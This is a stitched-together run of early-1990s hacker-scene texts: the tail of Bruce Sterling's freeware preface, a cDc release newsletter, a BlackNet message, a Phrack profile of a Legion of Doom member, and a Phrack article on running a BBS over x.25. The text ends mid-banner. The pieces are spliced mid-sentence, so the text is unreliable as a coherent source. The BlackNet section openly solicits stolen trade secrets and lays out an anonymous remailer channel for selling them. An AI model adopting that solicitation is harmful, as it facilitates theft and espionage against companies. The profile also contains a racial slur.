activist, you are the target audience for this book. I wrote this book because I wanted to help you, and help other people understand you and your unique, uhm, problems. I wrote this book to aid your activities, and to contribute to the public discussion of important political issues. In giving the text away in this fashion, I am directly contributing to the book's ultimate aim: to help civilize cyberspace. Information *wants* to be free. And the information inside this book longs for freedom with a peculiar intensity. I genuinely believe that the natural habitat of this book is inside an electronic network. That may not be the easiest direct method to generate revenue for the book's author, but that doesn't matter; this is where this book belongs by its nature. I've written other books -- plenty of other books -- and I'll write more and I am writing more, but this one is special. I am making *The Hacker Crackdown* available electronically as widely as I can conveniently manage, and if you like the book, and think it is useful, then I urge you to do the same with it. You can copy this electronic book. Copy the heck out of it, be my guest, and give those copies to anybody who wants them. The nascent world of cyberspace is full of sysadmins, teachers, trainers, cybrarians, netgurus, and various species of cybernetic activist. If you're one of those people, I know about you, and I know the hassle you go through to try to help people learn about the electronic frontier. I hope that possessing this book in electronic form will lessen your troubles. Granted, this treatment of our electronic social spectrum is not the ultimate in academic rigor. And politically, it has something to offend and trouble almost everyone. But hey, I'm told it's readable, and at least the price is right. You can upload the book onto bulletin board systems, or Internet nodes, or electronic discussion groups. Go right ahead and do that, I am giving you express permission right now. Enjoy yourself. You can put the book on disks and give the disks away, as long as you don't take any money for it. But this book is not public domain. You can't copyright it in your own name. I own the copyright. Attempts to pirate this book and make money from selling it may involve you in a serious litigative snarl. Believe me, for the pittance you might wring out of such an action, it's really not worth it. This book don't "belong" to you. In an odd but very genuine way, I feel it doesn't "belong" to me, either. It's a book about the people of cyberspace, and distributing it in this way is the best way I know to actually make this information available, freely and easily, to all the people of cyberspace -- including people far outside the borders of the United States, who otherwise may never have a chance to see any edition of the book, and who may perhaps learn something useful from this strange story of distant, obscure, but portentous events in so-called "American cyberspace." This electronic book is now literary freeware. It now belongs to the emergent realm of alternative information economics. You have no right to make this electronic book part of the conventional flow of commerce. Let it be part of the flow of knowledge: there's a difference. I've divided the book into four sections, so that it is less ungainly for upload and download; if there's a section of particular relevance to you and your colleagues, feel free to reproduce that one and skip the rest. Just make more when you need them, and give them to whoever might want them. Now have fun. Bruce Sterling -- bruces@well.sf.ca.us ------------------------------------------------------------------------------ _ _ ((___)) [ x x ] cDc communications \ / Global Domination Update #14 (' ') December 30th, 1993 (U) Est. 1986 New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for December, 1993: _________________________________/Text Files\_________________________________ 241: "Cell-Hell" by Video Vindicator. In-depth article on modifying the Mitsubishi 800 cellular phone by Mr. Fraud himself. Rad. 242: "The Darkroom" by Mark Vaxlov. Very dark story about a high school rape in the photography lab at school. Disturbing. 243: "Fortune Smiles" by Obscure Images. Story set in the future with organized crime and identity-swapping. 244: "Radiocarbon Dating Service" by Markian Gooley. Who would go out with Gooley? YOUR MOM! 245: "The U.S. Mercenary Army" by Phil Agee. Forwarded by The Deth Vegetable, this file contains a speech by former CIA agent Agee on the Gulf War. Interesting stuff. 246: "The Monolith" by Daniel S. Reinker. This is one of the most disgusting files we've put out since the infamous "Bunny Lust." I don't wanna describe this, just read it. 247: "Post-Election '92 Cult Coverage" by Omega. Afterthoughts on Tequila Willy's bid for the U.S. Presidency. 248: "The Lunatic Crown" by Matthew Legare. Wear the crown. Buy a Slurpee. Seek the adept. Do not pass 'Go.' 249: "Yet Another Suicide" by The Mad Hatter. Guy gets depressed over a girl and kills himself. 250: "State of Seige" by Curtis Yarvin. The soldiers hunt the dogs hunt the soldiers. Like, war, ya know. Hell! __________________________________/cDc Gnuz\__________________________________ "cDc: We're Into Barbie!" cDc mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing list! Send mail to cDc@cypher.com and include some wonderlessly elite message along he lines of "ADD ME 2 DA MAILIN LIZT!!@&!" NEW Official cDc Global Domination Factory Direct Outlets: The Land of Rape and Honey 502/491-6562 Desperadoes +61-7-3683567 Underworld 203/649-6103 Airstrip-One 512/371-7971 Ministry of Death 516/878-1774 Future Shock +61-7-3660740 Murder, Inc 404/416-6638 The Prodigal Sun 312/238-3585 Red Dawn-2 Enterprises 410/263-2258 Cyber Neurotic Reality Test 613/723-4743 Terminal Sabotage 314/878-7909 The Wall 707/874-1316,2970 We're always taking t-file submissions, so if you've got a file and want to really get it out there, there's no better way than with cDc. Upload text to The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post office box in Lubbock, TX. cDc has been named SASSY magazine's "Sassiest Underground Computer Group." Hell yeah! Thanks to Drunkfux for setting up another fun HoHoCon this year, in Austin. It was cool as usual to hang out with everyone who showed up. Music credits for stuff listened to while editing this batch of files: Zapp, Carpenters, Deicide, and Swingset Disaster. Only text editor worth a damn: ProTERM, on the Apple II. So here's the new cDc release. It's been a while since the last one. It's out because I fucking felt like it, and have to prove to myself that I can do this crap without losing my mind and having to go stand in a cotton field and look at some dirt at 3 in the morning. cDc=cDc+1, yeah yeah. Do you know what this is about? Any idea? This is SICK and shouldn't be harped on or celebrated. This whole cyberdweeb/telecom/'puter underground scene makes me wanna puke, it's all sick and dysfunctional. Eat my shit, G33/" and we can be contacted (preferably through a chain of anonymous remailers) by encrypting a message to our public key (contained below) and depositing this message in one of the several locations in cyberspace we monitor. Currently, we monitor the following locations: alt.extropians, alt.fan.david-sternlight, and the "Cypherpunks" mailing list. BlackNet is nominally nondideological, but considers nation-states, export laws, patent laws, national security considerations and the like to be relics of the pre-cyberspace era. Export and patent laws are often used to explicity project national power and imperialist, colonialist state fascism. BlackNet believes it is solely the responsibility of a secret holder to keep that secret--not the responsibility of the State, or of us, or of anyone else who may come into possession of that secret. If a secret's worth having, it's worth protecting. BlackNet is currently building its information inventory. We are interested in information in the following areas, though any other juicy stuff is always welcome. "If you think it's valuable, offer it to us first." - - trade secrets, processes, production methods (esp. in semiconductors) - nanotechnology and related techniques (esp. the Merkle sleeve bearing) - chemical manufacturing and rational drug design (esp. fullerines and protein folding) - new product plans, from children's toys to cruise missiles (anything on "3DO"?) - business intelligence, mergers, buyouts, rumors BlackNet can make anonymous deposits to the bank account of your choice, where local banking laws permit, can mail cash directly (you assume the risk of theft or seizure), or can credit you in "CryptoCredits," the internal currency of BlackNet (which you then might use to buy _other_ information and have it encrypted to your special public key and posted in public place). If you are interested, do NOT attempt to contact us directly (you'll be wasting your time), and do NOT post anything that contains your name, your e-mail address, etc. Rather, compose your message, encrypt it with the public key of BlackNet (included below), and use an anonymous remailer chain of one or more links to post this encrypted, anonymized message in one of the locations listed (more will be added later). Be sure to describe what you are selling, what value you think it has, your payment terms, and, of course, a special public key (NOT the one you use in your ordinary business, of course!) that we can use to get back in touch with you. Then watch the same public spaces for a reply. (With these remailers, local PGP encryption within the remailers, the use of special public keys, and the public postings of the encrypted messages, a secure, two-way, untraceable, and fully anonymous channel has been opened between the customer and BlackNet. This is the key to BlackNet.) A more complete tutorial on using BlackNet will soon appear, in plaintext form, in certain locations in cyberspace. Join us in this revolutionary--and profitable--venture. BlackNet -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCPAixusCEAAAEEAJ4/hpAPevOuFDXWJ0joh/y6zAwklEPige7N9WQMYSaWrmbi XJ0/MQXCABNXOj9sR3GOlSF8JLOPInKWbo4iHunNnUczU7pQUKnmuVpkY014M5Cl DPnzkKPk2mlSDOqRanJZCkyBe2jjHXQMhasUngReGxNDMjW1IBzuUFqioZRpABEB AAG0IEJsYWNrTmV0PG5vd2hlcmVAY3liZXJzcGFjZS5uaWw+ =Vmmy -----END PGP PUBLIC KEY BLOCK----- ==Phrack Magazine== Volume Five, Issue Forty-Five, File 7 of 28 **************************************************************************** -:[ Phrack Pro-Phile ]:- This issue our prophile introduces you to one of the all-around coolest people ever to show up in the computer underground. Someone I'm happy to have had the good fortune to meet and force to ingest excessive quantities of intoxicating liquids and other unmentionables. Someone who very recently showed up on tabloid television amazingly for something other than computer hacking. Someone we know as: Control C ~~~~~~~~~ _______________________________________________________________________________ Personal Info: Handle : Control C Call Me : A Cab DOB : 1969 AGE : I Would Hope You Can Figure It Out.. Height : 6'0" Weight : 160 Groups Affiliated With : Legion of Doom/Hackers! Other Past Handles : Phase Jitter, Master of Impact, Dual Capstan, Richo Sloppy, Cosmos Dumpster Driver, Poster Boy, Whacky Wally (Sysop Whacky Wally's Wonderful World of Warez, as some of you may remember.. It Was a Hack/Phreak Board) Computers Owned: 1st Computer-Texas Instruments T-1000 ------------------------------------- Once I expanded the memory (4K plug in Module, for a total of 8k), I was unstoppable in BASIC. Commodore Vic-20 ---------------- What can you say about a Vic-20? Commodore 64 ------------ Now I was big time. 1541 Disk drive was an unbelievable upgrade from my Vic-20 and T-1000 mass storage devices (Cassette Recorder). Apple //C --------- I was now a \/\/Arez d00d. What else could you be if you had an Apple? Everyone was! IBM XT ------ This was a real step up from CP/M (hahaha). I had incredible CGA Graphics. Actually it was not a bad system. My dad got a modem with it. Bad mistake eh? I was flying at 300 baud. This is the system all my BBSes were run on. AT&T 3B1 -------- Lame, Lame, Lame... That about covers it. Commodore AMIGA 500 -------------------- A real computer at last. Real graphics. Real Sound. Real Multi-Tasking. A Real Operating System. And again...I was a \/\/ArEz D00D. But this time I was running 14.4K Baud. If you want a real computer BUY AMIGA!!! IBM 486DX2/66 ------------- Desk Top Video is really cool. But when you put you computers in the car people steal them and AAA Insurance gives you a hard time. Still fighting with them. Commodore AMIGA 3000 -------------------- I'm a \/\/arez Dood. And the KING of Desk Top Video. BUT don't put all your computers in the same car. Oops... Commodore AMIGA 500 ------------------- Now I'm back to a 500 Until I get my Insurance company to pay me. ---------------------------------------------------------------------- General Questions: Q: How did you get your Handle? A: If you cant figure this out...you should not be reading this. Q: How did you get started? A: Dad bought me an IBM XT with a 300 Baud Modem. I saw War Games...and off I went. Q: What are some of your other interests? A: Women... Women... Women... Everybody knows about my high level of hormonal activity. Also, Cars. If you don't have a Mitusubishi 3000GT: U R Lame. If you have a Stealth, I bet you wish you bought a 3000GT--after you have dealt with the FUCKING ASSHOLES at the Chrysler DealerShit. Everybody says buy American. Well, you buy a FUCKING brand new American car and it brakes down 32 times. The Chrysler dealer treats you like shit. The manufacturer treats you like shit. And your car runs like shit. The problem is that the American auto workers have absolutely no pride in their workmanship; and the manufacturers and dealers don't give a shit about you or your car after they have made the sale. Then they wonder why their sales are down and people are buying foreign cars. Well, if I go into the Mitusubishi Dealership they treat me like a king and I bought the car 6 months ago. If your gonna by a car, don't buy a Chrysler. They Suck! I bought a brand new Jeep. It broke down 32 Times. Chrysler treated me like shit. Maybe you could tell. Q: What were some of your most memorable experiences? A: The First SummerCon. Disk Jockey and LOKI came to my house the day before. This is the first time we had met. On the way to my house they got lost and came across a street called 'Summerton.' So at about 0200 in the morning we were on the corner of Summerton Street and all the sudden the Summerton sign fell of the post and landed in the car owned by Disk Jockey. Well we changed the T to a C and all the suddenly we had a SummerCon street sign. The trip down was a story in it self, as many of you have heard. It was really neat to meet all the people from the boards. I met Bill From RNOC who was my mentor and idol, but doesn't call me anymore.. (Thanks Bill). Lex Luthor who is one of the funniest guys, we will get into this later. Taran King, Knight Lightning (Scoop!), Lucifer 666...it was ELITE! SummerCon 87' - This is when I got it LOD/H. I remember sitting at the pool with Mentor being really drunk and both of us going "WOW!!! We're in LOD!" My Bust - In 1987 I was going to school in Chicago. I was on an Michigan Bell UNIX sharpening up my C programming skills, which, buy the way still need sharpening. I was on the system for 4+ hours. Well the system administrator had noticed me and called MBT security. They traced the call back to Chicago. The strange part of this was that the next morning I was quitting school and moving back to Detroit. When I got home to Detroit their was a message from MBT Security to call them or they would "Call On Me!". Well I thought it would be in my best interest to give them a ring. We met for lunch. At lunch they told me since I had been in their systems for years and not destroyed or changed anything...in fact they had never noticed me there...They would not press charges if I helped them secure there systems. I said "Ok!". The next thing I know I have an office. k-Rad elite computer. Craft Access terminals. Manuals for every phone company computer on the planet and they are paying me $30,000 a year to do what I love. I was a professional Computer Hacker. I broke into Michigan Bell computers, networks, switches, went trashing etc...while being paid. It was great. I would see what I could do once I was into their systems, then write a report on what needed to be changed or fixed. I was great for them, and me. Then I get fired - my boss at Michigan Bell loves me! Her boss loves me! The Vice President of Michigan Bell loves me! Then Michigan Bell has a retirement incentive. The Vice President and my bosses boss retire. The New manager of computer security is closed-minded, and fires me because I am "A criminal". Well, those guys at corporate security at Michigan Bell are totally out of touch. Their knowledge of computer security is...how shall I say it..."lacking," I think, covers it. In fact, the code for the front door at the Michigan Bell Corporate Security Building is the equivalent to leaving the code on your luggage 000 and wondering how the airport baggage guy figure out your code and stole all your stuff. They should have kept me on like the old guys wanted to do. It is my understanding, and I don't know because I don't do ANYTHING ILLEGAL (like the disclaimer?), but I hear that a lot of hackers are in Michigan Bell Systems. Michigan Bell Security is probably convinced that their systems are airtight. If you guys at Michigan Bell are reading this, You need help.. Look through some of my old reports and implement some of that stuff. ---------------------------------------------------------------------- Some BBS's To Mention: Planet 10/Librarians of Doom - (810)683-9722. I'm Co-Sysop. It is the only BBS I call. All the Old LOD Guys are on it. It's pretty 3l33t. If you can't hack the New User Password--U R really lame! We got 0 day AMIGA Warez. Running on a USR HST. Leave a good New User Feedback message because the users on the system read the New User Feedback and vote whether or not you will be allowed access to the system based on that message. ShadowSpawn BBS - Well, this was before I was in LOD. Our claim to fame was that we wouldn't let anyone on the BBS unless they gave us a valid phone number. We voice verified EVERYONE. And talked to them before we gave them an account. Most of the people from LOD were not on because they would not give a valid phone number. It was not my idea it was Psychic Warlord's idea. I could not believe we turned Lex Luthor down--we got in quite a fight about that. Phantasy Realm - My first BBS. I always thought It was LAME, but people always tell me how cool it was. I guess when you login 15 times a day, it seems like the posting is slow. The Coalition - I was co-sysop on this board as well. Run by Bad Subscript, one of my best friends. Another board I never thought was cool but everyone says it was great. Guess maybe I called it too much as well. Metal Shop Private - I thought I was the Elite of the Elite when I got on there. There were guys from LOD posting and everything. I really was a cool system. Catch 22 - Well I think I was the last user before the system went down. I think I was on for about 3 days before it went off line. I think it was good. As least I used it for a reference on other BBS (That was when I was just becoming well known.) Whacky Wally's Wonderful World Of Warez - Some of you may remember it. It was an H/P board that I ran for a while before Phantasy Realm. It was mostly done for a joke, but it ended up being pretty cool. ---------------------------------------------------------------------- People to mention: Erreth Akbe - One of my best friends. Helped me write this profile. Sysop of Planet 10/Librarians of Doom. The MASTER NOVELL guy. If you want to know anything about NOVELL...Talk to him. (He's a CNE!!) Without him you would have all sorts of spelling errors and this profile would really look like shit. Plus, the BBS would have crashed long ago. He's my official editor. Carol - Erreth Akbe's Wife. Love ya babe! Got me a great deal on my 3000GT. I still owe you dinner! Bad Subscript - My best friend. What a great guy. We hit Industry (the coolest nightclub in Pontiac) every Tuesday night. He's the biggest LEEEECH in the world, though. At this point he has 192 Downloads @ 94 Megs and 9 Uploads @ 2 Megs. Great ratio, eh? Lucifer 666 - What a great guy. Still talk to him daily after all these years. Comes to Detroit a lot and I go to Illinois to see him a lot. I have a great story about L666. His family owns a real estate company in Illinois where he lives. Well, they sold a house to Virgil Ramsey, a Vietnam Vet. Well, Mr. Ramsey's new house has termite damage. L666 went to the house and verified the damage. He told Mr. Ramsey that he would call an exterminator the next day. Well I guess Mr. Ramsey didn't like the exterminator idea, because the next day he went to L666's office with a bolt-action rifle. Took L666 outside into the street, with the gun to his head, and told him he was going to kill him. L666 swung around and hit the gun barrel upwards just as Ramsey pulled the trigger. They fought over the gun and L666 tossed the gun into the street. Ramsey went after the gun and L666 ran into the real estate building and locked the back door. Ramsey ran in the front door with gun in hand. L666 went into his office and locked the door. Ramsey kicked in his office door. L666 was under his desk. Ramsey said "Stand Up (L666's First Name) and take it like a Man!" L666 jumped up and they fought over the gun again. (I was at his office and saw the footprints on his door). The bolt action opened and the bullet in the chamber fell to the ground. Ramsey put the gun to L666's head and pulled the trigger, but the action was open. The cops finally came in and arrested Ramsey. They say it is some type of stress related to Vietnam. Laurie (L666's Girlfriend) - She's Cool. Hi Hoochie! Well I have a good story about her. BTW If you talk to L666 ask him why I call his girlfriend "Baldie". Anyway. L666 and Laurie came to Detroit in October. The first night we went to this bar that I always go to, called Industry. Well Laurie was worried about the crime in Detroit. I had just got done telling her that nothing ever happens Besides, we were in Pontiac! L666, Bad Subscript, Erreth Akbe DarkStar, Laurie and I were all in the car. We pulled into the Industry parking lot. Some guy was laying on the ground and 3 guys were kicking him. Then they picked him up. Through him into the back of a panel van and drove off. L666, DarkStar and Laurie had been in Detroit for all of an hour and this is the first thing we see when we go to the bar. Needless to say, she was freaking out. The rest of the weekend went smoothly, though--except for DarkStar and L666 flashing deuce gang signs at Club X in Detroit. Not a smart move. DarkStar - Hay bud. He's really fun. We party together a lot in Detroit and Illinois, but I wouldn't take him to Las Vegas with me. He did really shitty on the river boat we gambled on in the Mississippi river last November. Prime Suspect - Fellow LOD member. One of the smartest hackers I have ever met. In fact PR1ME Computers call him to help program there kernels when they can't figure it out. No lie! He also is Mr. Packet Radio. I really had fun with the cellular phone interception. I talk to him 3-4 times a week. He and Bad Subscript talk more, though. Finally after 6 or 7 years he came to Detroit to see us last November. We had a great time. I'm sure he'll be back. Bill From RNOC - Fellow LOD Member. My Mentor. He taught me about UNIX and Phone Company Computer and Networks. Taught me how to engineer. Was a great friend. We talked 3-4 times a day for a yea or so. Haven't talked to him much lately. Hope everything is going well for you, Bill... Lex Luthor - Mr. LOD! U R Out of Control! Lex is a great guy. There have been rumors about him floating around for years. Let me tell you. They are all false. He is the greatest guy. At SummerCon he was pretty mellow. He stayed at my house for a week or two. He was a blast. I have pictures of Him, Bad Subscript and me sitting on a dumpster outside EDS, and painted on the dumpster it says "Computer Papers Only". Also have picture of him and I outside a funeral home with the address "2600" in BIG letters. Now he has been denying this outside in his underwear story for years. Here it is. Lex stayed at my house for a few weeks. I hooked him up with this girl (she was HOT.. And he was tearing it up with her every night). Well we went to Motel Sex (Motel 6) one night and were drinking pretty heavy. At about 0100 in the morning he went out of his room in his underwear. Now the doors to the rooms are outside. And was kicking my door yelling "We need more Beer!". I think it was blown a little out of proportion. I hear a story that he was running around the parking lot or something. But that is the story...anyway he's a great guy. Phantom Phreaker - Fellow LOD Member. FUN FUN FUN. He is one of the friendliest people I have ever meet. He is a blast to party with. Love the hair! He has good things to say about everyone. I have never meet anyone that knows more about Switching System and such than him. He is a walking phone company manual. BTW: How's your balls? (Private Joke) Doom Prophet - Fellow LOD Member. Phantom Phreaker's Twin Brother. Haven't seen much of him the last few years. Another walking manual. Hope you're doing good. The Marauder - Fellow LOD Member. I really got along great with him.. Didn't see much of him the second night. He and Phantom Phreaker were hiding...but he was really a great guy! Taran King/Knight Lightning - Got me into the "Elite" Scene. I really like you guys. Always a lot of fun. Don't see much of you anymore at the SummerCons. Train King is off with this woman, now wife. Congratulations.. Hope you are happy forever And Knight Lightning is on the run from the Hotel manager who is running around asking everyone "Are you Craig Nedordorf?". Erik Bloodaxe - Fellow LOD Member. We have been completely "Out of Control" together. He is a blast. We have had our differences, and I don't really know why. But I really like him. He is BIG fun! I didn't see much of you at the last SummerCon. Hope to talk to you more in the Future! Forest Ranger - JT. What a great and fun guy. In the past we didn't hang out too much, but last year at SummerCon we really had a great time together. What a ladies' man! Hope to see you soon. Give me a call...maybe you can come to Detroit with L666 and go to the Gran Prix. I'm getting us all pit passes! The Mentor - Fellow LOD Member. Great guy. We got into LOD/H together. Haven't heard much from him lately. Hope all is well. The Prophet/The UrVile/The Leftist - Fellow LOD Members. The three of us really got along great. We were always together at the SummerCons. We talked 5000000 times a day on the phone. I really liked them. They were really cool.. Then............ What the FUCK! The government flew them to Detroit to testify in front of the grand jury against me. No problem--you do what you gotta do. But if you're in town you could at least give me a call after all we have been through together. That was really weak. And don't return my calls 3 years later... Whatever! Dispater - All around fun guy. Didn't go to SummerCon last year. I know Erreth Akbe was bummed. He was really looking forward to seeing you. I'm not going this year, but if I *WAS*, I would really like to see ya. High Evolutionary - We have never met, but in the mid 80's we talked daily. Haven't heard anything about him in years. He was really a smart guy. Hope all is well. Psychic Warlord - Great guy. Sysop of ShadowSpawn. We hung around A LOT in the old days. I understand you are getting married. Congratulations. Hope I'm invited. Mitch Kapor (Programmer of LOTUS) - You know why Mitch. I thank you much. If you ever need anything. You have my phone number! Jim F - He helped me out of a LOT of problems.. Thanks Jim! (Please Note: These are in no special order. If you are on the top of the list or the bottom it has no relation to your importance on the list.) --------------------------------------------------------------------- What I think of the Future of the Underground: Ahahaha.. LAME, LAME, LAME.. In the old days we were the first to do things. We would get on a system and play with it for hours. It was a quest for knowledge. That was what LOD/H was all about. Today's new "hackers" are really assholes. They don't do it to learn. They want to mess things up. I really can't stand the new anarchy thing that is going around. We have kids logging onto the BBS that say "I have 400+ viruses". Well.. That's not cool. The purpose of hacking is to learn. Learn the way a computer system runs. Learn how the telephone switching systems work. Learn how a packet switching network works. It's not to destroy things or make other peoples lives a mess by deleting all the work they did for the past week. The reason the Department of Justice has crackdowns on computer hackers is because so many of them are destructive. That's just stupid criminal behavior and I hope they all get busted. They shouldn't be around. You give real hackers a bad name. ---------------------------------------------------------------------- Other Things to Mention: The "NEW Legion of Doom" - Beyond Lame. It is my understanding that some lame kid from Canada (eh!) was starting a "New LOD". Well those kids couldn't hack their way into, let alone out of a Cracker Jack box. If they are on you BBS.. Delete them! They have absolutely no affiliation with the real Legion of Doom! DrunkFux - Jessie, I have been trying to get a hold of you for a year now. If you could get my number and call me. Or call our board (810)683-9722 and leave me your phone number. I would like to get Dena's phone number from you. ---------------------------------------------------------------------- In the late 80's someone call forwarded my home phone to a Voice Mail Box.. I heard it was SuperNigger, but he says not.. I thought you guys might get a kick out of the message left on it. My name's Control C.. AKA Phase Jitter of LOD! Elite as can be... I thought that was Me! Until they forwarded my number to a V.M.B. ---------------------------------------------------------------------- Well that's about it.. My final words of wisdom... Call our board.. It's 3l33t! Control C Legion of Doom/Hackers 1994 ==Phrack Magazine== Volume Five, Issue Forty-Five, File 8 of 28 **************************************************************************** Running a Board on x.25 ======================= In this article, I want to inform the reader about advantages, problems, experiences and fun about running a BBS on x.25. I also want to do a few comparisons between x.25 on one hand and the Internet and phone system on the other. This article may also help you to setup a BBS on a UNIX, no matter if on x.25 or not. I. Systems on x.25... ========================== In my article for Phrack 42 about the German scene (read it if you haven't done so yet! :-) I also mentioned the x.25 scene and a few Bulletin Board Systems (BBS / boards) on it. One of the most popular ones, LUTZIFER, just went down on December 20, 1993. Lutzifer used to be one of the most popular x.25 boards back in 1990 and early 1991, when US people were still able to use Tymnet ("video" and "parmaster") and Sprintnet without much of a hassle. I spoke with Lutz (sysop of Lutzifer) at the CCC Congress in Hamburg a week later. He told me that he first just wanted to change the speed for his x.25 connection from 9600 to 2400 to save some money (actually 50%), because he didn't get too many calls anyway. But the German Telekom (who handle x.25 AND the phone lines) wanted him to cancel his old x.25 connection, get a new NUA, pay the $300 installation fee, all to get a 2400 bps connection. This really made Lutz mad, and he finally decided to cancel all x.25 - so goodbye to Lutzifer! On the other side, QSD (the lamest chat system one can imagine) is still up and running on x.25. Back in Summer 1993, there have been many rumors that QSD would go down. It wasn't reachable from most networks in the world anymore, including Sprintnet, Datex-P and others. They were probably just "testing" something - but QSD will never have its >80 online users again (sounds pretty ridiculous compared to IRC :) that it had back in the good old days. II. Advantages of x.25 ========================== You may wonder what the advantages of running a board on x.25 are. Wouldn't an Internet link or a phone dialup be enough? In fact, the Internet is getting more and more popular, the number of its hosts is increasing dramatically. This, and the fact that ISDN is faster and available to more and more people at cheaper rates, makes x.25 seem unattractive. But x.25 is a very old and safe network. It hasn't really changed in 10 years. There are hardly any netsplits like on the Internet, and it has a very low rate of data errors. X.25 is available in almost every country (far over 200) in the world, even in countries that never heard of Internet like Mauritius or United Arab Emirates. This means that a lot of people from all over the world can call you at a cheap rate (at least cheaper than international phone charges, for some people even free at all :). To the sysop it offers a couple of features that modems can't offer, and where the Internet isn't safe enough. This is also a reason why most banks, insurances and credit agencies still rely on x.25. I will describe those features in the next chapter. III. Setting up your X.25 board ================================== So let's get practical after all this boring theory! How do you start if you want to setup your own x.25 board? First of all, you need your own x.25 line. In most countries your phone company would be responsible; in a few countries like the US you may even have a choice of different x.25 providers like "Sprintnet". The prices for those lines really vary. You may check the Sprintnet or Tymnet Toll Free information service, that also gives you information and prices about other countries. E.g. in Germany a 2400 bps (the slowest) link would be US$130 a month, a 9600 bps link about $260. The good thing though is that each additional virtual channel is just $3 more per month (in Germany). A number of 16 channels is typical and 128 channels aren't exotic. But remember, all channels have to share the maximum bandwidth of - let's say - 9600 bps. So if 10 people would start to leech the latest Phrack at the same time, they would all just have 960 bps each or 96 cps. But downloading isn't always that easy. In fact, many of my users have been reporting problems while trying to download. While a few x.25 networks like Datapak Norway and German Datex-P are true 8 bit networks, many networks and PADs just handle 7 bit connections. It's not always that easy to transfer binaries at 7 bit, though it was possible for me to download from a Sprintnet dialup using a 'good' version of Z-Modem. X.25 is not the right choice if you want to transfer huge amounts of data anyway. It is meant for people who work interactively. It is recommended for people who want to do a database research, read and write email and news or just chat. You will also notice that, if you are a paying x.25 user (aren't you all :-) and get your bills, connection time is really cheap; up to 70 times cheaper than long distance phone charges. What counts are the transmitted bytes, no matter how fast you are! You easily pay $30 for transferring 1 MB. But what else do you need after you got your x.25 link? You need a PC (which doesn't have to be fast; I was using a 386sx for quite some time. In fact, my new 486/40 board is 'too fast' for my old x.25 8 bit adaptor :). It might also be interesting to run it on a Sun or HP workstation; but the x.25 cards for those machines are rather expensive. Then you need a good operating system. Don't even think of running DOS. You want to have a multi-user multi-tasking system after all, don't you? So your choice is UNIX. Systems with pretty good x.25 solutions are Interactive and SCO Unix. They are both old fashioned System V / 386's, but are running safely, hardly ever crash and are popular in the commercial world. I chose Interactive. How do you connect your PC to the x.25 line? Good guess. Yes, you need an adaptor card. I got an EICON/PC card. EICON cards are probably the best supported and most common x.25 cards - they are made in Canada. However, they aren't cheap. Usually they are around $1000, if you are lucky you could get a used one for $600. You might get a cheaper x.25 adaptor, but check in advance if the software you want to use supports that adaptor. There is no real standard concerning x.25 cards! Anything else you need? Yes, the most important thing - the software. UNIX doesn't come with x.25 drivers. However, there is a really good x.25 solution available from netCS Software in Berlin, Germany. (The company was co-founded by "Pengo" Hans H. Send them mail to postmaster@netcs.com for info.) IV. Features ================ This software, and x.25 in general, has a few nice features. If you receive an x.25 call from somewhere, the NUA ("Network User Address") of the caller is being transmitted to you. This works pretty much like Caller-ID, with the exception that the caller can't prevent it from being transmitted, and he usually can't fake the address he is calling from. Of course he can call through a couple of systems, and you would just see the NUA of the last system he calls you from. This feature can easily be used to accept or reject calls from certain NUAs/systems or whole countries. Many systems like banks just allow certain NUAs to call them, just the ones that they know. You could also give different access to different people: people from country A may login to your system, country B may just write you a mail, all other countries are forced into chat and the NUA of CERT is being rejected and received a "nice" goodbye message. Of course you will also keep a logfile (and 99% of the systems you call will have a logfile with YOUR call and the calls you might place using its pad). This logfile usually contains the NUA that calls you (or that is being called), the programs that are being executed, the userid of the caller, duration, reason for termination and more. Another interesting feature is the 'Call User Data' (CUD). The caller may transmit up to 16 bytes (default is 4 bytes) to your host before he establishes an x.25 connection. In these bytes he may send you a Service Request. The default CUD is 01/00/00/00 and means 'interactive login'. You may define any CUD you want and just accept calls that use that certain CUD - it would work like a system password then. Many systems may also have a service request that allows the caller to execute commands on that host remotely, without supplying any additional password (be aware of this!) For more technical information about x.25 read one of the articles in the previous issues of Phrack. I am glad that Phrack is still covering x.25 with plenty of interesting articles after all these years! IV. Chosing the BBS Software ================================ Okay. Now we decided to choose UNIX as operating system. Of course, you could give all your users shell access, create a guest account with limited shell access and a chat account that kicks you just into chat. That's what I used to do first. But since we want to run an open system and give accounts to many hackers, it might be a scary vision that all of them have shell access and try to hack your system. This is the point when you are looking for a BBS software for UNIX. There aren't too many free BBSes for UNIX around, most of them cost some hundred dollars (check out the latest Boardwatch issue for more information). However, I found a pretty decent BBS software called 'Uniboard'. It runs fine on most System V's including Interactive and SCO; versions for Sun OS and Linux are available too. It offers you a nice colorful (you may turn it to black & white) menu driven interface. You have to have C-News and sendmail installed and running. Instead of sendmail I use smail, which is bug-free, much easier to install and offers at least the same features. C-News though isn't that easy to install and takes quite some time and document reading. But these packages are used by Uniboard for messages (news) and email. This is pretty nice, because you can just exchange mail with everyone on the Internet. You can also read your favorite newsgroups in Uniboard like alt.sex.bondage and post to local groups. The filebase is designed okay, but it doesn't feature the concept of ratios yet. (You just get one byte download ability for each byte you upload!). Rick, the author, promised me to put it into the next version though. The biggest drawback is that you will just get the binary, no sources available, so you can't put in all the features you would like. For more information send email to the author Rick in Italy at pizzi@nervous.com. He will give you a free demo key that works for a few weeks, if you ask him. Afterwards you could get a key for $40 and more, depending how many users you want to have. V. How to get more users ============================= You may think: Okay, fine. But not everybody has x.25 access, though (almost) everybody has Internet access. How could these people call me? Well, the solution isn't easy. I was told though that someone installed an Internet site that would forward the call through an x.25 PAD to my system. Of course, the system administrator of that Internet site found out after a while and installed the following banner (he obviously has a sense of humor :) - someone sent me this log: telnet> open pythia.csi.forth.gr 2600 Trying 139.91.1.1 ... Connected to pythia.csi.forth.gr. Escape character is '^]'. Welcome to Sectec Direct. Please hold the line. :) Calling...connected... MUniBoard v. 1.12 400 users Runtime System S/N 345968791 Licensed for single machine use to Seven Down on sectec Unauthorized duplication allowed Loading.. ________________________________________________ /~ .~ / _ . ~/~ _ . |~ __ ~| _ . \~ _ _ ~/ // ____/_ |_\__/. | \__|. |__| | |_\__/\/ | | \/ /____ ~/ _|__|| | __|: _| _|__ || | // . //: |_/. \: |_/. || |\ \\: |_/. \ |: | /_____ /|________\______|__| \__\_______\ |__| ___________________________________________ ___________________ \~ _ _ ~/ _ . ~/ _ .\~ _ _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~ / \/ | | \/ |_\__/ | 